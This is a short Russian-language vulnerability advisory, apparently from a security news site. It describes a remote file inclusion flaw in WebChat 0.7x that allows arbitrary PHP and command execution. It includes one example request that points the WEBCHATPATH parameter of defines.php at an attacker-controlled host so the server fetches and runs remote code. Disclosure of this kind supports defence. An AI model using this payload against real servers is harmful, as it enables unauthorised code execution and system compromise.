Security Lab

Выполнение произвольных команд в WebChat

Дата публикации:05.03.2003
Всего просмотров:1278
Опасность:
Высокая
Наличие исправления: Да
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации: Удаленная
Воздействие: Компрометация системы
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты: WebChat 0.7x
Описание: Уязвимость включения файла обнаружена в WebChat. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевом сервере.

Сценарий 'defines.php' включает файлы 'db_mysql.php' и 'language/eng lish.php' через переменную $WEBCHATPATH, но не проверяет правильность местоположения файла перед его включением. Удаленный пользователь может определить удаленное местоположение этих файлов, заставляя целевой сервер включить и выполнить дистанционно расположенные файлы. Пример:

http://[target]/defines.php?WEBCHATPATH=http://[attacker]/

где
http://[attacker]/language/english.php или http://[attacker]/language/db_mysql.php
Уязвимость обнаружена в WebChat 0.77
Ссылки: WebChat